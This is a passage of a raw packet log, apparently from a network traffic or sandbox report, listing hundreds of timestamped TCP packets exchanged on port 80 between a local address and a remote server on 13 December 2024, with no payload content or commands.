                                                                                                                                                                                                Dec 13, 2024 08:19:00.655181885 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.655339956 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.659780979 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.659905910 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.659996033 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.664411068 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.664542913 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.666718006 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.669060946 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.669179916 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.669296026 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.672883987 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.672987938 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.673250914 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.676729918 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.676836967 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.678733110 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.680577993 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.680716991 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.680856943 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.684477091 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.684603930 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.684679985 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.688224077 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.688327074 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.688747883 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.692110062 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.692186117 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.692240000 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.695924044 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.696042061 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.696166992 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.699825048 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.699872017 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.700352907 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.730021954 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.730113029 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.730424881 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.731992006 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.732002974 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.732131958 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.802059889 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.802227974 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.802350044 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.803436041 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.803551912 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.803639889 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.806324959 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.806449890 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.806804895 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.809295893 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.809416056 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.809519053 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.812258005 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.812341928 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.812582970 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.815112114 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.815210104 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.815406084 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.817914009 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.818005085 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.818099976 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.820601940 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.820709944 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.821551085 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.823331118 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.823457956 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.823620081 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.825963974 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.826071024 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.826900959 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.828535080 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.828643084 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.828804970 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.831134081 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.831233025 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.831270933 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.833827972 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.833839893 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.833935976 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.836638927 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.836649895 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.836719036 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.838865042 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.838903904 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.839040041 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.841470957 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.841578007 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.841624975 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.844049931 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.844134092 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.844320059 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.846647024 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.846774101 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.846836090 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.849270105 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.849354982 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.849461079 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.851841927 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.851943970 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.852235079 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.854393005 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.854499102 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.854765892 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.857052088 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.857157946 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.857223034 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.858917952 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.859031916 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.860899925 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.860966921 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.862739086 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.862740993 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.862777948 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.863643885 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.864484072 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.864617109 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.864717960 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.993927956 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.993978024 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.994112968 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.994437933 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.994690895 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.995428085 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.996211052 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.996310949 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.996409893 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.998116016 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.998186111 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.998287916 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.999774933 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.999928951 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.000334024 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.001698017 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.001728058 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.001852036 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.003366947 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.003499031 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.004026890 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.005168915 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.005325079 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.005418062 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.007061005 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.007148981 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.007438898 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.008833885 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.008848906 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.008972883 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.010485888 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.010678053 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.011106968 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.012295961 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.012437105 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.012521982 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.014179945 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.014353037 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.014431000 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.015795946 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.015894890 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.016180992 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.017647028 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.017822027 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.017961979 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.019407988 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.019506931 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.019922018 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.021203995 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.021430016 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.021603107 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.022984028 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.023122072 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.023447037 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.024745941 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.024866104 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.024975061 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.026546001 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.026611090 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.027105093 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.028688908 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.028701067 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.028875113 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.030085087 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.030143023 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.030508041 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.031903982 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.031996012 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.032205105 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.033670902 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.033776999 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.033921003 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.035449028 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.035528898 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.035629034 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.037234068 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.037342072 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.038957119 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.039045095 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.039140940 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.039283991 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.040819883 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.040848970 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.041052103 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.042589903 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.042711020 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.042937994 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.044425011 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.044477940 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.044598103 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.046195030 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.046307087 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.046715021 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.047975063 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.048094988 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.048293114 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.049761057 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.049880981 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.051548004 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.051637888 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.051702976 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.051820993 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.053335905 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.053466082 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.053539038 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.055109024 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.055212975 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.055289984 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.056865931 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.056968927 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.057965994 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.058681965 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.058777094 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.059056044 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.060448885 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.060553074 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.060681105 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.062249899 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.062339067 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.063338995 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.064054012 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.064152002 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.065192938 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.065794945 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.065905094 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.066494942 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.067584038 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.067667007 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.067886114 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.069406986 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.069535017 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.070590973 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.071172953 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.071279049 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.071407080 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.072978020 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.073081017 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.073286057 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.074732065 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.074872971 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.074966908 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.076498032 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.076606989 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.076818943 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.078260899 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.078401089 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.078891993 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.080080986 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.080194950 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.080249071 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.081857920 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.136961937 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.186336994 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.186391115 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.186569929 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.187035084 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.187100887 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.187251091 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.188700914 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.188813925 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.189152956 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.190258980 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.190399885 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.190556049 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.191864014 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.192025900 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.192794085 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.193402052 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.193550110 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.193703890 CET4974880192.168.2.11185.81.68.147
